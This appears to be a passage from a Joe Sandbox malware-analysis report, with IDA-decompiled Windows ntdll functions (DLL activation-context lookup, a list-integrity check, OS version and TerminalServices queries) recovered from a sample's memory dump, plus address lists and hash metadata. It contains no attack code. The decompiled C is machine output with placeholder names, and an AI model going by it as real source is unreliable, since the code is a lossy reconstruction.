                                                                                                                                                                            				_t69 =  *0x1d915a7c;
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				if(_t69 == 0) {
                                                                                                                                                                            					 *0x1d9191e0();
                                                                                                                                                                            					E1D85B490(__ecx, __edx,  *__ecx());
                                                                                                                                                                            					_t55 =  *((intOrPtr*)(_t73 - 0x14));
                                                                                                                                                                            					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
                                                                                                                                                                            					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
                                                                                                                                                                            					_t34 =  *0x1d915d38; // 0x4be14c90
                                                                                                                                                                            					 *(_t73 - 0x30) = _t34;
                                                                                                                                                                            					__eflags =  *0x1d9165fc; // 0xcb6b2004
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_push(4);
                                                                                                                                                                            						_push(_t73 - 0x2c);
                                                                                                                                                                            						_push(0x24);
                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                            						 *(_t73 - 0x1c) = E1D862B20();
                                                                                                                                                                            						__eflags =  *(_t73 - 0x1c);
                                                                                                                                                                            						if( *(_t73 - 0x1c) < 0) {
                                                                                                                                                                            							E1D878AA0(_t55, _t63,  *(_t73 - 0x1c));
                                                                                                                                                                            						}
                                                                                                                                                                            						 *0x1d9165fc =  *(_t73 - 0x2c);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t35 =  *0x1d9165fc; // 0xcb6b2004
                                                                                                                                                                            					 *(_t73 - 0x20) = _t35;
                                                                                                                                                                            					_push(0x20);
                                                                                                                                                                            					asm("ror eax, cl");
                                                                                                                                                                            					 *(_t73 - 0x34) =  *(_t73 - 0x30);
                                                                                                                                                                            					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
                                                                                                                                                                            					__eflags = _t40;
                                                                                                                                                                            					 *(_t73 - 0x38) = _t40;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						 *((intOrPtr*)(_t73 - 0x3c)) = E1D8D8890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7f50b4);
                                                                                                                                                                            						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *0x1d9191e0( *((intOrPtr*)(_t73 - 0x24)));
                                                                                                                                                                            						_t42 =  *( *(_t73 - 0x38))();
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
                                                                                                                                                                            					return  *((intOrPtr*)(_t73 - 0x28));
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *0x1d9191e0();
                                                                                                                                                                            					_t50 =  *_t69();
                                                                                                                                                                            					 *(_t73 - 4) = 0xfffffffe;
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
                                                                                                                                                                            					return _t50;
                                                                                                                                                                            				}
                                                                                                                                                                            			}











                                                                                                                                                                            0x1d857a4f
                                                                                                                                                                            0x1d857a4f
                                                                                                                                                                            0x1d857a4f
                                                                                                                                                                            0x1d857a51
                                                                                                                                                                            0x1d857a56
                                                                                                                                                                            0x1d857a5b
                                                                                                                                                                            0x1d857a5d
                                                                                                                                                                            0x1d857a61
                                                                                                                                                                            0x1d857a67
                                                                                                                                                                            0x1d857a6a
                                                                                                                                                                            0x1d8947f8
                                                                                                                                                                            0x1d894801
                                                                                                                                                                            0x1d894806
                                                                                                                                                                            0x1d89480d
                                                                                                                                                                            0x1d894810
                                                                                                                                                                            0x1d894813
                                                                                                                                                                            0x1d894818
                                                                                                                                                                            0x1d89481d
                                                                                                                                                                            0x1d894823
                                                                                                                                                                            0x1d894825
                                                                                                                                                                            0x1d894826
                                                                                                                                                                            0x1d89482b
                                                                                                                                                                            0x1d89482c
                                                                                                                                                                            0x1d89482e
                                                                                                                                                                            0x1d894835
                                                                                                                                                                            0x1d894838
                                                                                                                                                                            0x1d89483b
                                                                                                                                                                            0x1d894840
                                                                                                                                                                            0x1d894840
                                                                                                                                                                            0x1d894848
                                                                                                                                                                            0x1d894848
                                                                                                                                                                            0x1d89484d
                                                                                                                                                                            0x1d894852
                                                                                                                                                                            0x1d89485b
                                                                                                                                                                            0x1d894863
                                                                                                                                                                            0x1d894865
                                                                                                                                                                            0x1d89486b
                                                                                                                                                                            0x1d89486b
                                                                                                                                                                            0x1d89486e
                                                                                                                                                                            0x1d894871
                                                                                                                                                                            0x1d894892
                                                                                                                                                                            0x1d894895
                                                                                                                                                                            0x1d894873
                                                                                                                                                                            0x1d89487b
                                                                                                                                                                            0x1d894881
                                                                                                                                                                            0x1d894881
                                                                                                                                                                            0x1d894898
                                                                                                                                                                            0x1d89489e
                                                                                                                                                                            0x1d857a70
                                                                                                                                                                            0x1d857a72
                                                                                                                                                                            0x1d857a7c
                                                                                                                                                                            0x1d8948ac
                                                                                                                                                                            0x1d8948b6
                                                                                                                                                                            0x1d8948c2
                                                                                                                                                                            0x1d8948c2

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4281723722-0
                                                                                                                                                                            • Opcode ID: a1da83b3f957749b1870121ce7be57bec85e06089406c2da9315534c7be00b6e
                                                                                                                                                                            • Instruction ID: 56cf6220f98ac65ec1225665724ff2a9037c1592527d986c9a9c3a6cded47d53
                                                                                                                                                                            • Opcode Fuzzy Hash: a1da83b3f957749b1870121ce7be57bec85e06089406c2da9315534c7be00b6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 05311275E04228EFCB05DFACD884AADBBB0FB88360F11416AE521B7390C7356900CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                            			E1D854B79(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				char _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                            				intOrPtr* _t97;
                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            				void* _t104;
                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                            				intOrPtr* _t112;
                                                                                                                                                                            				intOrPtr* _t113;
                                                                                                                                                                            				signed int _t114;
                                                                                                                                                                            				void* _t115;
                                                                                                                                                                            
                                                                                                                                                                            				_t107 = __edx;
                                                                                                                                                                            				_t72 =  *0x1d91b370 ^ _t114;
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t114;
                                                                                                                                                                            				_t110 = __ecx;
                                                                                                                                                                            				_v96 = __edx;
                                                                                                                                                                            				_t99 = __edx;
                                                                                                                                                                            				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
                                                                                                                                                                            					L12:
                                                                                                                                                                            					return E1D864B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t110 = __ecx + 4;
                                                                                                                                                                            					_t97 =  *_t110;
                                                                                                                                                                            					while(_t97 != _t110) {
                                                                                                                                                                            						_t6 = _t97 - 8; // -4
                                                                                                                                                                            						_t111 = _t6;
                                                                                                                                                                            						_t107 = 1;
                                                                                                                                                                            						if( *_t111 != 0x74736c46) {
                                                                                                                                                                            							_v84 = _v84 & 0x00000000;
                                                                                                                                                                            							_push( &_v92);
                                                                                                                                                                            							_v76 = 4;
                                                                                                                                                                            							_v72 = 1;
                                                                                                                                                                            							_v68 = 1;
                                                                                                                                                                            							_v64 = _t110;
                                                                                                                                                                            							_v60 = _t111;
                                                                                                                                                                            							_v92 = 0xc0150015;
                                                                                                                                                                            							_v88 = 1;
                                                                                                                                                                            							E1D878A60(_t99, 1);
                                                                                                                                                                            							_t99 = _v96;
                                                                                                                                                                            							_t107 = 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
                                                                                                                                                                            							_v84 = _v84 & 0x00000000;
                                                                                                                                                                            							_push( &_v92);
                                                                                                                                                                            							_v76 = 4;
                                                                                                                                                                            							_v72 = _t107;
                                                                                                                                                                            							_v68 = 2;
                                                                                                                                                                            							_v64 = _t110;
                                                                                                                                                                            							_v60 = _t111;
                                                                                                                                                                            							_v92 = 0xc0150015;
                                                                                                                                                                            							_v88 = _t107;
                                                                                                                                                                            							E1D878A60(_t99, _t107);
                                                                                                                                                                            							_t99 = _v96;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t9 = _t111 + 0x18; // 0x1c
                                                                                                                                                                            						_t72 = _t9;
                                                                                                                                                                            						if(_t99 < _t9) {
                                                                                                                                                                            							L13:
                                                                                                                                                                            							_t97 =  *_t97;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t10 = _t111 + 0x618; // 0x614
                                                                                                                                                                            							_t72 = _t10;
                                                                                                                                                                            							if(_t99 >= _t10) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v96 = 0x30;
                                                                                                                                                                            								_t82 = _t99 - _t111 - 0x18;
                                                                                                                                                                            								asm("cdq");
                                                                                                                                                                            								_t107 = _t82 % _v96;
                                                                                                                                                                            								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
                                                                                                                                                                            								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
                                                                                                                                                                            									_t72 =  *(_t111 + 4);
                                                                                                                                                                            									if(_t72 != 0) {
                                                                                                                                                                            										_t86 = _t72 - 1;
                                                                                                                                                                            										 *(_t111 + 4) = _t86;
                                                                                                                                                                            										_t72 =  !_t86;
                                                                                                                                                                            										 *(_t111 + 0x14) =  !_t86;
                                                                                                                                                                            										 *((intOrPtr*)(_t99 + 8)) = 4;
                                                                                                                                                                            										if( *(_t111 + 4) == 0) {
                                                                                                                                                                            											_t72 =  *(_t97 + 4);
                                                                                                                                                                            											if(_t72 != _t110) {
                                                                                                                                                                            												do {
                                                                                                                                                                            													_t111 =  *(_t72 + 4);
                                                                                                                                                                            													_t56 = _t72 - 8; // 0xfffffff6
                                                                                                                                                                            													_t107 = _t56;
                                                                                                                                                                            													if( *((intOrPtr*)(_t107 + 4)) != 0) {
                                                                                                                                                                            														goto L33;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														_t102 =  *_t72;
                                                                                                                                                                            														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
                                                                                                                                                                            															_push(3);
                                                                                                                                                                            															asm("int 0x29");
                                                                                                                                                                            															_t104 = 0x3f;
                                                                                                                                                                            															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
                                                                                                                                                                            																_t72 = _t72 + 8;
                                                                                                                                                                            															}
                                                                                                                                                                            															_t112 =  *0x1d9165e4; // 0x767ff0e0
                                                                                                                                                                            															 *0x1d9191e0(_t107, _t72,  &_v8);
                                                                                                                                                                            															_t113 =  *_t112();
                                                                                                                                                                            															if(_t113 >= 0) {
                                                                                                                                                                            																L18:
                                                                                                                                                                            																_t89 = _v8;
                                                                                                                                                                            																if(_t89 != 0) {
                                                                                                                                                                            																	if( *(_t110 + 0x48) != _t97) {
                                                                                                                                                                            																		E1D8226A0(_t89,  *(_t110 + 0x48));
                                                                                                                                                                            																		_t89 = _v8;
                                                                                                                                                                            																	}
                                                                                                                                                                            																	 *(_t110 + 0x48) = _t89;
                                                                                                                                                                            																}
                                                                                                                                                                            																if(_t113 < 0) {
                                                                                                                                                                            																	if(( *0x1d9137c0 & 0x00000003) != 0) {
                                                                                                                                                                            																		E1D89E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
                                                                                                                                                                            																	}
                                                                                                                                                                            																	if(( *0x1d9137c0 & 0x00000010) != 0) {
                                                                                                                                                                            																		asm("int3");
                                                                                                                                                                            																	}
                                                                                                                                                                            																}
                                                                                                                                                                            																return _t113;
                                                                                                                                                                            															} else {
                                                                                                                                                                            																if(_t113 != 0xc000008a) {
                                                                                                                                                                            																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
                                                                                                                                                                            																		goto L16;
                                                                                                                                                                            																	} else {
                                                                                                                                                                            																		if(_t113 != 0xc00000bb) {
                                                                                                                                                                            																			goto L18;
                                                                                                                                                                            																		} else {
                                                                                                                                                                            																			goto L16;
                                                                                                                                                                            																		}
                                                                                                                                                                            																	}
                                                                                                                                                                            																	goto L53;
                                                                                                                                                                            																} else {
                                                                                                                                                                            																	L16:
                                                                                                                                                                            																	if(( *0x1d9137c0 & 0x00000005) != 0) {
                                                                                                                                                                            																		_push(_t113);
                                                                                                                                                                            																		_t67 = _t110 + 0x24; // 0x123
                                                                                                                                                                            																		E1D89E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
                                                                                                                                                                            																		_t115 = _t115 + 0x1c;
                                                                                                                                                                            																	}
                                                                                                                                                                            																	_t113 = _t97;
                                                                                                                                                                            																}
                                                                                                                                                                            																goto L18;
                                                                                                                                                                            															}
                                                                                                                                                                            														} else {
                                                                                                                                                                            															 *_t111 = _t102;
                                                                                                                                                                            															 *(_t102 + 4) = _t111;
                                                                                                                                                                            															E1D833BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
                                                                                                                                                                            															goto L33;
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            													goto L53;
                                                                                                                                                                            													L33:
                                                                                                                                                                            													_t72 = _t111;
                                                                                                                                                                            												} while (_t111 != _t110);
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L53;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L12;
                                                                                                                                                                            				}
                                                                                                                                                                            				L53:
                                                                                                                                                                            			}





























                                                                                                                                                                            0x1d854b79
                                                                                                                                                                            0x1d854b86
                                                                                                                                                                            0x1d854b88
                                                                                                                                                                            0x1d854b8e
                                                                                                                                                                            0x1d854b90
                                                                                                                                                                            0x1d854b93
                                                                                                                                                                            0x1d854b97
                                                                                                                                                                            0x1d854c27
                                                                                                                                                                            0x1d854c35
                                                                                                                                                                            0x1d854ba7
                                                                                                                                                                            0x1d854ba7
                                                                                                                                                                            0x1d854baa
                                                                                                                                                                            0x1d854bac
                                                                                                                                                                            0x1d854bb2
                                                                                                                                                                            0x1d854bb2
                                                                                                                                                                            0x1d854bb5
                                                                                                                                                                            0x1d854bbc
                                                                                                                                                                            0x1d89330f
                                                                                                                                                                            0x1d893316
                                                                                                                                                                            0x1d893317
                                                                                                                                                                            0x1d89331e
                                                                                                                                                                            0x1d893321
                                                                                                                                                                            0x1d893324
                                                                                                                                                                            0x1d893327
                                                                                                                                                                            0x1d89332a
                                                                                                                                                                            0x1d893331
                                                                                                                                                                            0x1d893334
                                                                                                                                                                            0x1d893339
                                                                                                                                                                            0x1d89333e
                                                                                                                                                                            0x1d89333e
                                                                                                                                                                            0x1d854bca
                                                                                                                                                                            0x1d893344
                                                                                                                                                                            0x1d89334b
                                                                                                                                                                            0x1d89334c
                                                                                                                                                                            0x1d893353
                                                                                                                                                                            0x1d893356
                                                                                                                                                                            0x1d89335d
                                                                                                                                                                            0x1d893360
                                                                                                                                                                            0x1d893363
                                                                                                                                                                            0x1d89336a
                                                                                                                                                                            0x1d89336d
                                                                                                                                                                            0x1d893372
                                                                                                                                                                            0x1d893372
                                                                                                                                                                            0x1d854bd0
                                                                                                                                                                            0x1d854bd0
                                                                                                                                                                            0x1d854bd5
                                                                                                                                                                            0x1d854c36
                                                                                                                                                                            0x1d854c36
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854bd7
                                                                                                                                                                            0x1d854bd7
                                                                                                                                                                            0x1d854bd7
                                                                                                                                                                            0x1d854bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854be1
                                                                                                                                                                            0x1d854be3
                                                                                                                                                                            0x1d854bec
                                                                                                                                                                            0x1d854bef
                                                                                                                                                                            0x1d854bf0
                                                                                                                                                                            0x1d854bf9
                                                                                                                                                                            0x1d854bfd
                                                                                                                                                                            0x1d854bff
                                                                                                                                                                            0x1d854c04
                                                                                                                                                                            0x1d854c06
                                                                                                                                                                            0x1d854c07
                                                                                                                                                                            0x1d854c0a
                                                                                                                                                                            0x1d854c0c
                                                                                                                                                                            0x1d854c0f
                                                                                                                                                                            0x1d854c1a
                                                                                                                                                                            0x1d854c1c
                                                                                                                                                                            0x1d854c21
                                                                                                                                                                            0x1d89337a
                                                                                                                                                                            0x1d89337a
                                                                                                                                                                            0x1d89337d
                                                                                                                                                                            0x1d89337d
                                                                                                                                                                            0x1d893384
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d893386
                                                                                                                                                                            0x1d893386
                                                                                                                                                                            0x1d89338b
                                                                                                                                                                            0x1d8933b2
                                                                                                                                                                            0x1d8933b5
                                                                                                                                                                            0x1d8933b9
                                                                                                                                                                            0x1d8933be
                                                                                                                                                                            0x1d8933f7
                                                                                                                                                                            0x1d8933f7
                                                                                                                                                                            0x1d854c76
                                                                                                                                                                            0x1d854c84
                                                                                                                                                                            0x1d854c8c
                                                                                                                                                                            0x1d854c90
                                                                                                                                                                            0x1d854ca9
                                                                                                                                                                            0x1d854ca9
                                                                                                                                                                            0x1d854cae
                                                                                                                                                                            0x1d854ce4
                                                                                                                                                                            0x1d854cee
                                                                                                                                                                            0x1d854cf3
                                                                                                                                                                            0x1d854cf3
                                                                                                                                                                            0x1d854ce6
                                                                                                                                                                            0x1d854ce6
                                                                                                                                                                            0x1d854cb2
                                                                                                                                                                            0x1d893463
                                                                                                                                                                            0x1d89347b
                                                                                                                                                                            0x1d893480
                                                                                                                                                                            0x1d89348a
                                                                                                                                                                            0x1d893490
                                                                                                                                                                            0x1d893490
                                                                                                                                                                            0x1d89348a
                                                                                                                                                                            0x1d854cbe
                                                                                                                                                                            0x1d854c92
                                                                                                                                                                            0x1d854c98
                                                                                                                                                                            0x1d854cc5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d893423
                                                                                                                                                                            0x1d893429
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89342f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89342f
                                                                                                                                                                            0x1d893429
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854c9a
                                                                                                                                                                            0x1d854c9a
                                                                                                                                                                            0x1d854ca1
                                                                                                                                                                            0x1d893434
                                                                                                                                                                            0x1d893435
                                                                                                                                                                            0x1d89344f
                                                                                                                                                                            0x1d893454
                                                                                                                                                                            0x1d893454
                                                                                                                                                                            0x1d854ca7
                                                                                                                                                                            0x1d854ca7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854c98
                                                                                                                                                                            0x1d893391
                                                                                                                                                                            0x1d893398
                                                                                                                                                                            0x1d89339c
                                                                                                                                                                            0x1d8933a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8933a2
                                                                                                                                                                            0x1d89338b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8933a7
                                                                                                                                                                            0x1d8933a7
                                                                                                                                                                            0x1d8933a9
                                                                                                                                                                            0x1d8933ad
                                                                                                                                                                            0x1d854c21
                                                                                                                                                                            0x1d854c1a
                                                                                                                                                                            0x1d854c04
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854bfd
                                                                                                                                                                            0x1d854bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854bd5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854bac
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0$Flst
                                                                                                                                                                            • API String ID: 0-758220159
                                                                                                                                                                            • Opcode ID: ff2a71a3781e11feade75146ced36b156dfb7825d70d09725110040ae7878247
                                                                                                                                                                            • Instruction ID: b7f81dc9687386dd1a2048ce2e284ec946c8707cdc9011c1fc370b43f9b25421
                                                                                                                                                                            • Opcode Fuzzy Hash: ff2a71a3781e11feade75146ced36b156dfb7825d70d09725110040ae7878247
                                                                                                                                                                            • Instruction Fuzzy Hash: A15178B1B002999FCB15CF9DD584769FBF4EF84714F15802EE0899B250E7B09D85CB82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                            			E1D820485(intOrPtr* __ecx) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				char _v32;
                                                                                                                                                                            				char _t50;
                                                                                                                                                                            				intOrPtr* _t51;
                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                            				char _t84;
                                                                                                                                                                            				void* _t85;
                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                            				intOrPtr* _t89;
                                                                                                                                                                            
                                                                                                                                                                            				_t89 = __ecx;
                                                                                                                                                                            				_t76 =  *[fs:0x30];
                                                                                                                                                                            				_t73 =  *0x1d916630; // 0x0
                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
                                                                                                                                                                            				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
                                                                                                                                                                            				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
                                                                                                                                                                            				_v12 = _t76;
                                                                                                                                                                            				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
                                                                                                                                                                            				_t84 = 0;
                                                                                                                                                                            				if(_t73 == 0) {
                                                                                                                                                                            					_t73 = E1D8282E0(0xabababab, 0, "kLsE", 0);
                                                                                                                                                                            					 *0x1d916630 = _t73;
                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t85 = _t84 - 1;
                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                            						 *((intOrPtr*)(_t89 + 8)) = 2;
                                                                                                                                                                            						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
                                                                                                                                                                            						L19:
                                                                                                                                                                            						 *((intOrPtr*)(_t89 + 4)) = 6;
                                                                                                                                                                            						L6:
                                                                                                                                                                            						_t86 = _v12;
                                                                                                                                                                            						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
                                                                                                                                                                            						if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                                            							L8:
                                                                                                                                                                            							 *((short*)(_t89 + 0x14)) = 0;
                                                                                                                                                                            							goto L9;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t38 = _t89 + 0x14; // 0x130
                                                                                                                                                                            							if(E1D845C3F(_t38, 0x100, _t51) >= 0) {
                                                                                                                                                                            								L9:
                                                                                                                                                                            								if( *_t89 != 0x11c) {
                                                                                                                                                                            									if( *_t89 != 0x124) {
                                                                                                                                                                            										L16:
                                                                                                                                                                            										return 0;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
                                                                                                                                                                            								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
                                                                                                                                                                            								 *(_t89 + 0x118) = E1D820670();
                                                                                                                                                                            								if( *_t89 == 0x124) {
                                                                                                                                                                            									 *(_t89 + 0x11c) = E1D820670() & 0x0001ffff;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((char*)(_t89 + 0x11a)) = 0;
                                                                                                                                                                            								if(E1D820630( &_v16) != 0) {
                                                                                                                                                                            									 *((char*)(_t89 + 0x11a)) = _v16;
                                                                                                                                                                            								}
                                                                                                                                                                            								E1D865050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
                                                                                                                                                                            								_push( &_v24);
                                                                                                                                                                            								_push(4);
                                                                                                                                                                            								_push( &_v8);
                                                                                                                                                                            								_push( &_v20);
                                                                                                                                                                            								_push( &_v32);
                                                                                                                                                                            								if(E1D863EE0() >= 0) {
                                                                                                                                                                            									if(_v8 == 1) {
                                                                                                                                                                            										if(_v20 != 4 || _v24 != 4) {
                                                                                                                                                                            											goto L15;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											goto L16;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            									L15:
                                                                                                                                                                            									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
                                                                                                                                                                            									if( *_t89 == 0x124) {
                                                                                                                                                                            										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L16;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t85 == 1) {
                                                                                                                                                                            						 *((intOrPtr*)(_t89 + 8)) = 3;
                                                                                                                                                                            						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
                                                                                                                                                                            						goto L19;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				if(_t73 != E1D820690) {
                                                                                                                                                                            					 *0x1d9191e0();
                                                                                                                                                                            					_t50 =  *_t73();
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t50 = E1D820690();
                                                                                                                                                                            				}
                                                                                                                                                                            				_t84 = _t50;
                                                                                                                                                                            				goto L4;
                                                                                                                                                                            			}


















                                                                                                                                                                            0x1d82048f
                                                                                                                                                                            0x1d820493
                                                                                                                                                                            0x1d82049a
                                                                                                                                                                            0x1d8204a0
                                                                                                                                                                            0x1d8204a3
                                                                                                                                                                            0x1d8204a6
                                                                                                                                                                            0x1d8204af
                                                                                                                                                                            0x1d8204b8
                                                                                                                                                                            0x1d8204c2
                                                                                                                                                                            0x1d8204cb
                                                                                                                                                                            0x1d8204ce
                                                                                                                                                                            0x1d8204d2
                                                                                                                                                                            0x1d8204d6
                                                                                                                                                                            0x1d82060e
                                                                                                                                                                            0x1d820610
                                                                                                                                                                            0x1d820618
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8204ef
                                                                                                                                                                            0x1d8204ef
                                                                                                                                                                            0x1d8204f2
                                                                                                                                                                            0x1d8205e3
                                                                                                                                                                            0x1d8205ea
                                                                                                                                                                            0x1d8205f1
                                                                                                                                                                            0x1d8205f1
                                                                                                                                                                            0x1d820501
                                                                                                                                                                            0x1d820501
                                                                                                                                                                            0x1d820504
                                                                                                                                                                            0x1d82050c
                                                                                                                                                                            0x1d820519
                                                                                                                                                                            0x1d82051b
